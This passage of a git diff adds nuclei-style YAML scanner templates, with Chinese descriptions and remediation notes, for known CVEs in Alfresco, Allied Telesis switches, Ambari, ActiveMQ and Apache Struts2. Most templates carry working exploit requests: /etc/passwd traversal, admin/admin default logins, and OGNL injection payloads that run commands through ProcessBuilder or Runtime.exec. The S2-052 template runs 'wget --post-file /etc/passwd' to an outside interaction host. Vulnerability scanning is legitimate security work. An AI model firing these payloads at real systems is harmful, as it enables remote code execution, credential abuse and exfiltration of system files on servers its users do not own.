7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + condition: or + regex: + - name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])" + - type: regex + condition: or + regex: + - provider":\s*"ldap" + extractors: + - name: alerta-version + type: regex + regex: + - name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])" + group: 1 + part: body + matchers-condition: and + path: + - '{{BaseURL}}/api/config' + method: GET diff --git a/config/51pwn/yaml/Alfresco Software Alfresco Community Edition/CVE-2019-14223.yaml b/config/51pwn/yaml/Alfresco Software Alfresco Community Edition/CVE-2019-14223.yaml new file mode 100755 index 000000000..6504d6fa8 --- /dev/null +++ b/config/51pwn/yaml/Alfresco Software Alfresco Community Edition/CVE-2019-14223.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-14223 +info: + name: Alfresco Share Open Redirect + author: + - pdteam + description: |- + Alfresco Software Alfresco Community Edition 输入验证错误漏洞 + Alfresco Software Alfresco Community Edition是美国Alfresco Software公司的一套开源的企业内容管理系统的社区版。该系统包括文档管理、办公协作等功能。 + + Alfresco Software Alfresco Community Edition 5.2.6 6.0.N之前版本和6.1.N之前版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.alfresco.com/ + + 临时修复方案:
1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*:\s*)(?:https?://|//|\\)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$ + path: + - '{{BaseURL}}/share/page/dologin' + method: POST + body: | + success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass + headers: + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/Allied Telesis AT-GS950/8/CVE-2019-18922.yaml b/config/51pwn/yaml/Allied Telesis AT-GS950/8/CVE-2019-18922.yaml new file mode 100755 index 000000000..428baa0ad --- /dev/null +++ b/config/51pwn/yaml/Allied Telesis AT-GS950/8/CVE-2019-18922.yaml @@ -0,0 +1,28 @@ +id: CVE-2019-18922 +info: + name: Allied Telesis AT-GS950/8 Directory Traversal + author: + - 0x_akoko + description: |- + Allied Telesis AT-GS950/8 路径遍历漏洞 + Allied Telesis AT-GS950/8是日本Allied Telesis公司的一款交换机。 + + 使用1.00.047之前版本固件的Allied Telesis AT-GS950/8中的Web界面存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.alliedtelesis.com + + 临时修复方案:
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Amazon Acexy Wireless-N WiFi Repeater REV/CVE-2021-28937.yaml b/config/51pwn/yaml/Amazon Acexy Wireless-N WiFi Repeater REV/CVE-2021-28937.yaml new file mode 100755 index 000000000..16889c464 --- /dev/null +++ b/config/51pwn/yaml/Amazon Acexy Wireless-N WiFi Repeater REV/CVE-2021-28937.yaml @@ -0,0 +1,29 @@ +id: CVE-2021-28937 +info: + name: Acexy Wireless-N WiFi Repeater Password Disclosure + author: + - geeknik + description: |- + Amazon Acexy Wireless-N WiFi Repeater REV 安全漏洞 + Amazon Acexy Wireless-N WiFi Repeater REV是美国Amazon公司的一个无线网络。用于提供网络服务 + + Acexy Wireless-N WiFi Repeater REV 1.0 存在安全漏洞,该漏洞源于包含管理员帐号的明文密码。可以在HTTP上拦截该页面。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://blog-ssh3ll.medium.com/acexy-wireless-n-wifi-repeater-vulnerabilities-8bd5d14a2990 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - Password Setting + - addCfg('username' + - addCfg('newpass' + matchers-condition: and + path: + - '{{BaseURL}}/password.html' + method: GET diff --git a/config/51pwn/yaml/Ambari/ambari-default-login.yaml b/config/51pwn/yaml/Ambari/ambari-default-login.yaml new file mode 100755 index 000000000..720f5fc94 --- /dev/null +++ b/config/51pwn/yaml/Ambari/ambari-default-login.yaml @@ -0,0 +1,40 @@ +id: ambari-default-login +info: + name: Apache Ambari Default Login + author: + - l0ne1y + description: |- + Apache Ambari 默认口令登录漏洞 + Apache Ambari是一种基于Web的工具,支持Apache Hadoop集群的供应、管理和监控。 + + Apache Ambari管理后台存在默认账户admin/admin。 + severity: high + remediation: |- + **官方修复方案:** + 厂商尚未提供漏洞修补方案,请关注厂商主页及时更新: + http://ambari.apache.org/ + + **临时修复方案** + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:https://suijimimashengcheng.51240.com/ + 5、推荐口令强度在线检测:https://howsecureismypassword.net/ +requests: +- matchers: + - type: word + condition: and + words: + - '"Users" : {' + - AMBARI. + raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork + payloads: + password: + - admin + username: + - admin diff --git a/config/51pwn/yaml/AnchorCMS/CVE-2018-7251.yaml b/config/51pwn/yaml/AnchorCMS/CVE-2018-7251.yaml new file mode 100755 index 000000000..cc542fc6a --- /dev/null +++ b/config/51pwn/yaml/AnchorCMS/CVE-2018-7251.yaml @@ -0,0 +1,26 @@ +id: CVE-2018-7251 +info: + name: Anchor CMS 0.12.3 - Error Log Exposure + author: + - l0ne1y + description: |- + AnchorCMS 信息泄露漏洞 + Anchor是一套开源的轻博客系统。该系统支持Markdown编辑器、自定义字段和多种语言等。 + + Anchor 0.12.3版本中的config/error.php文件存在信息泄露漏洞。攻击者可借助错误日志利用该漏洞获取数据库凭证。 + severity: critical + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/anchorcms/anchor-cms/issues/1247 +requests: +- matchers: + - type: word + condition: and + words: + - '"date":' + - '"message":' + - '"trace":[' + path: + - '{{BaseURL}}/anchor/errors.log' + method: GET diff --git a/config/51pwn/yaml/Apache ActiveMQ/cve-2015-1830.yaml b/config/51pwn/yaml/Apache ActiveMQ/cve-2015-1830.yaml new file mode 100755 index 000000000..29491f4c5 --- /dev/null +++ b/config/51pwn/yaml/Apache ActiveMQ/cve-2015-1830.yaml @@ -0,0 +1,34 @@ +id: cve-2015-1830 +info: + name: ActiveMQ CVE-2015-1830 远程代码执行 + author: + - jim2g + description: "ActiveMQ存在远程代码执行漏洞\n Apache ActiveMQ是美国阿帕奇(Apache)软件基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring + Framework等。\n\nApache ActiveMQ for Windows 5.11.2之前5.x版本的fileserver upload/download + for blob messages功能中存在目录遍历漏洞。远程攻击者可利用该漏洞在任意目录下创建JSP文件。 " + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt + 临时修复方案: + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'ssdssdgsggsdgfg') + - type: dsl + dsl: + - contains(body,'<') + raw: + - | + PUT /fileserver/..\\zest.txt HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + ssdssdgsggsdgfg + req-condition: true diff --git a/config/51pwn/yaml/Apache ActiveMQ/cve-2016-3088.yaml b/config/51pwn/yaml/Apache ActiveMQ/cve-2016-3088.yaml new file mode 100755 index 000000000..96bafc915 --- /dev/null +++ b/config/51pwn/yaml/Apache ActiveMQ/cve-2016-3088.yaml @@ -0,0 +1,38 @@ +id: cve-2016-3088 +info: + name: ActiveMQ未授权访问漏洞 + author: + - jim2g + description: |- + ActiveMQ未授权访问漏洞 + Apache ActiveMQ是美国阿帕奇(Apache)基金会的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 + + 该漏洞源于Apache ActiveMQ Artemis 2.16.0之前版本,Apache ActiveMQ 5.16.1和5.15.14之前版本未能正确验证错误的有效用户的密码。在这种情况下,攻击者可提供有效的用户名,无需提供密码,即可获得对系统的未授权访问,获取敏感信息。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt + 临时修复方案: + 1、前后端同时对用户输入信息进行校验,双重验证机制。 + 2、调用功能前验证用户是否有权限调用相关功能。 + 3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。 + 4、采用成熟的权限管理框架,如spring security。 + 5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。 + 6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。 + 7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,'Version') + - contains(body,'ActiveMQ Console') + raw: + - | + GET /admin/ HTTP/1.1 + Host: {{Hostname}} + Cookie: JSESSIONID=u1csjrzi7v8uskekq64f1qr + Authorization: Basic YWRtaW46YWRtaW4= + req-condition: true diff --git a/config/51pwn/yaml/Apache Struts/CVE-2013-2248.yaml b/config/51pwn/yaml/Apache Struts/CVE-2013-2248.yaml new file mode 100755 index 000000000..a48bd9434 --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/CVE-2013-2248.yaml @@ -0,0 +1,29 @@ +id: CVE-2013-2248 +info: + name: Apache Struts - Multiple Open Redirection Vulnerabilities + author: + - l0ne1y + description: |- + Apache Struts DefaultActionMapper重定向漏洞 + Apache Struts框架是一个基于Java Servlets,JavaBeans, 和 JavaServer Pages (JSP)的Web应用框架的开源项目。 + + Apache Struts 2 DefaultActionMapper在处理短路径重定向参数前缀"redirect:"或"redirectAction:"时存在开放重定向漏洞,允许远程攻击者利用漏洞操作"redirect:"或"redirectAction:"后的信息,重定向URL到任意位置。 + severity: medium + remediation: |- + **官方修复方案** + 目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: + http://struts.apache.org/release/2.3.x/docs/s2-017.html + + **临时修复方案** + 1、代码固定跳转地址,不让用户控制变量。 + 2、跳转目标地址采用白名单映射机制、只对合法的 URL 做跳转。 + 3、合理充分的校验校验跳转的目标地址,非己方地址时告知用户跳转风险。 +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$ + path: + - '{{BaseURL}}/index.action?redirect:http://www.example.com/' + method: GET diff --git a/config/51pwn/yaml/Apache Struts/CVE-2019-0230.yaml b/config/51pwn/yaml/Apache Struts/CVE-2019-0230.yaml new file mode 100755 index 000000000..348ca00de --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/CVE-2019-0230.yaml @@ -0,0 +1,24 @@ +id: CVE-2019-0230 +info: + name: Apache Struts <=2.5.20 - Remote Code Execution + author: + - l0ne1y + description: |- + Apache Struts2 OGNL表达式注入漏洞(S2-059) + Apache Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。 + + Apache Struts 2.0.0版本至2.5.20版本中存在代码执行漏洞。攻击者可借助特制的请求利用该漏洞执行代码。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://cwiki.apache.org/confluence/display/ww/s2-059 +requests: +- matchers: + - type: word + part: body + words: + - '{{randstr}}16384' + path: + - '{{BaseURL}}/?id={{randstr}}%25{128*128}' + method: GET diff --git a/config/51pwn/yaml/Apache Struts/S2-001.yaml b/config/51pwn/yaml/Apache Struts/S2-001.yaml new file mode 100755 index 000000000..af39f5216 --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-001.yaml @@ -0,0 +1,42 @@ +id: S2-001 +info: + name: Struts2 S2-001 远程代码执行 + author: + - 折跃 + description: |- + Struts2 S2-001 远程代码执行 + 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + #### 临时修复方案: + 在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + path: + - '{{BaseURL}}{{tmpPath}}' + attack: clusterbomb + method: POST + body: | + username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22echo%22%2C%22{{verify}}%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + headers: + Content-Type: application/x-www-form-urlencoded + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,'''')}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-003.yaml b/config/51pwn/yaml/Apache Struts/S2-003.yaml new file mode 100755 index 000000000..0c6257bfa --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-003.yaml @@ -0,0 +1,44 @@ +id: S2-003 +info: + name: Apache Struts2 S2-003 RCE + author: + - 折跃 + description: |- + Struts2 S2-003 远程命令执行 + OGNL还提供了广泛的表达式评估功能(http://www.ognl.org/2.6.9/Documentation/html/LanguageGuide/expressionEvaluation.html)。该漏洞允许恶意用户绕过ParametersInterceptor内置的“#”使用保护,从而能够操纵服务器端上下文对象。 + 所以,例如,要将#session.user设置为'0wn3d',可以使用以下参数名称: + ('\ u0023'+'session 'user ' ')(未使用)= 0wn3d + 网址编码后会显示如下: + ('\ u0023'%20%2b%20'session 'user \ '))(未使用)= 0wn3d + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案 + 在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + - '!contains(body,"xwork.MethodAccessor.denyMethodExecution")' + path: + - '{{BaseURL}}{{tmpPath}}?%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27{{verify}}%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte[51020]%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29' + attack: clusterbomb + method: GET + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-008.yaml b/config/51pwn/yaml/Apache Struts/S2-008.yaml new file mode 100755 index 000000000..404999a8a --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-008.yaml @@ -0,0 +1,28 @@ +id: S2-008 +info: + name: Apache Struts2 S2-008 RCE + author: + - 折跃 + description: |- + Struts2 S2-008 远程代码执行 + S2-008 涉及多个漏洞,Cookie 拦截器错误配置可造成 OGNL 表达式执行,但是由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用使得这个点显得比较鸡肋。另一个比较鸡肋的点就是在 struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令. + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案: + 在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + path: + - '{{BaseURL}}/devmode.action?debug=command&expression=%28%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22{{verify}}%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B5000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%29' + method: GET + req-condition: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-012.yaml b/config/51pwn/yaml/Apache Struts/S2-012.yaml new file mode 100755 index 000000000..f0839610e --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-012.yaml @@ -0,0 +1,44 @@ +id: S2-012 +info: + name: Apache Struts2 S2-012 RCE + author: + - 折跃 + description: |- + Struts2 S2-012 远程代码执行 + S2-012中,包含特制请求参数的请求可用于将任意 OGNL 代码注入属性,然后用作重定向地址的请求参数,这将导致进一步评估。当重定向结果从堆栈中读取并使用先前注入的代码作为重定向参数时,将进行第二次评估。这使恶意用户可以将任意 OGNL 语句放入由操作公开的任何未过滤的 String 变量中,并将其评估为 OGNL 表达式,以启用方法执行并执行任意方法,从而绕过 Struts 和 OGNL 库保护。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案: + 在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + - '!regex(''echo.*?{{verify}}'',body)' + path: + - '{{BaseURL}}{{tmpPath}}' + attack: clusterbomb + method: POST + body: | + name=%25%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22{{verify}}%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new%20java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + headers: + Content-Type: application/x-www-form-urlencoded + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-016.yaml b/config/51pwn/yaml/Apache Struts/S2-016.yaml new file mode 100755 index 000000000..9384fd743 --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-016.yaml @@ -0,0 +1,45 @@ +id: S2-016 +info: + name: Apache Struts2 S2-016远程代码执行 + author: + - 折跃 + description: |- + Struts2 S2-016 远程代码执行 + Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令 + + redirect:和redirectAction:此两项前缀为Struts默认开启功能,目前Struts 2.3.15.1以下版本均存在此漏洞 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + 厂商已经发布Apache Struts 2.3.15.1以修复此安全漏洞,建议Struts用户及时升级到最新版本。 + 厂商安全公告:S2-016 链接:[http://struts.apache.org/release/2.3.x/docs/s2-016.html](http://struts.apache.org/release/2.3.x/docs/s2-016.html) + 软件升级页面:[http://struts.apache.org/download.cgi#struts23151](http://struts.apache.org/download.cgi#struts23151) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + raw: + - | + POST {{tmpPath}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + redirect:${%23p%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23p.println(%22{{verify}}%22),%23p.close()} + attack: clusterbomb + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-032.yaml b/config/51pwn/yaml/Apache Struts/S2-032.yaml new file mode 100755 index 000000000..d7b081f0b --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-032.yaml @@ -0,0 +1,44 @@ +id: S2-032 +info: + name: Apache S2-032 Struts RCE + author: + - 折跃 + description: |- + Struts2 S2-032 远程命令执行 + 当启用动态方法调用时,可以传递可用于在服务器端执行任意代码的恶意表达式。 + method: Action 前缀去调用声明为 public 的函数,只不过在低版本中 Strtus2 不会对 name 方法值做 OGNL 计算,而在高版本中会。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + 将Struts版本升级至Struts 2.3.20.2,2.3.24.2或者2.3.28.1来修复漏洞 + 新版本下载地址:[https://struts.apache.org/download.cgi#struts2328](https://struts.apache.org/download.cgi#struts2328) + + + #### 临时修复方案: + 在配置文件中关闭动态方法调用(Dynamic Method Invocation) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + raw: + - | + GET {{tmpPath}}?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=echo%20{{verify}} HTTP/1.1 + Host: {{Hostname}} + attack: clusterbomb + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-052.yaml b/config/51pwn/yaml/Apache Struts/S2-052.yaml new file mode 100755 index 000000000..c9211c685 --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-052.yaml @@ -0,0 +1,93 @@ +id: S2-052 +info: + name: Apache Struts2 S2-052 - Remote Code Execution + author: + - 折跃 + description: |- + Struts2 S2-052 远程命令执行 + 当Struts2使用了Struts2-Rest-Plugin插件时,如果http请求的Content-type为application/xml,则会使用XStreamHandler解析器实例化XStream对象来反序列化处理我们传入的XML数据,且在默认情况下是可以引入任意对象的(针对1.5.x以前的版本),因此我们可以通过反序列化引入任意类造成远程命令执行漏洞 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案: + 如果系统没有使用Struts REST插件,那么可以直接删除Struts REST插件,或者在配置文件中加入如下代码,限制服务端文件的扩展名 + ``` + + ``` +requests: +- matchers: + - type: word + condition: and + words: + - Debugging information + - com.thoughtworks.xstream.converters.collections.MapConverter + - type: status + status: + - 500 + matchers-condition: and + path: + - '{{BaseURL}}/struts2-rest-showcase/orders/3' + - '{{BaseURL}}/orders/3' + method: POST + body: | + + + + 0 + + + + + + false + 0 + + + + + + wget + --post-file + /etc/passwd + {{interactsh-url}} + + false + + + + + java.lang.ProcessBuilder + start + + + asdasd + + asdasd + + + + + + false + 0 + 0 + false + + false + + + + 0 + + + + + + + + + + headers: + Content-Type: application/xml diff --git a/config/51pwn/yaml/Apache Struts/S2-053.yaml b/config/51pwn/yaml/Apache Struts/S2-053.yaml new file mode 100755 index 000000000..f16150f8e --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-053.yaml @@ -0,0 +1,47 @@ +id: S2-053 +info: + name: Apache Struts2 S2-053 - Remote Code Execution + author: + - 折跃 + description: |- + Struts2 S2-053 远程命令执行 + Struts2在使用Freemarker模板引擎的时候,同时允许解析OGNL表达式。导致用户输入的数据本身不会被OGNL解析,但由于被Freemarker解析一次后变成离开一个表达式,被OGNL解析第二次,导致任意命令执行漏洞。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁 + + #### 临时修复方案 + 1. Freemarker标签内容不要通过Request方式获取 + 2. 使用只读属性来初始化value属性(仅限getter属性),不要使用如下结构 + ``` + <@s.hidden name=”redirectUri” value=redirectUri /> + ``` +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(all_headers,to_string(to_number(verify)*to_number(3))) + path: + - '{{BaseURL}}{{tmpPath}}' + attack: clusterbomb + method: POST + body: | + username=%25%7B{{verify}}%2a3%7D&password=123456 + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + headers: + Content-Type: 